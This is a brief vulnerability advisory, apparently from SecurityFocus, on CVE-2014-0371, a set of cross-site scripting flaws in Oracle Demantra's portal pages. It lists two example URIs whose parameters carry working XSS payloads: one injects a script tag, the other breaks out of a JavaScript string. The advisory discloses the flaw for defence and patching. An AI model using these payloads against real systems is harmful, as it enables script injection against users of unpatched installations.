Oracle Supply Chain Products Suite CVE-2014-0371 Multiple Cross Site Scripting Vulnerabilities

The following example URIs are available:

http://www.example.com:8080/demantra/portal/editExecDefinition.jsp?menuBarId=2&menuGroupId=5&menuGroupName=Applications</title><script>alert('XSS')</script>&tkn=-308184887676887

http://www.example.com:8080/demantra/portal/htmlQuery.jsp?queryId=12510&view=0&levelId=null&memberId=null&comb=15525';}alert('XSS');function+aaa(){//271&tkn=427890217092227


 

Privacy Statement
Copyright 2010, SecurityFocus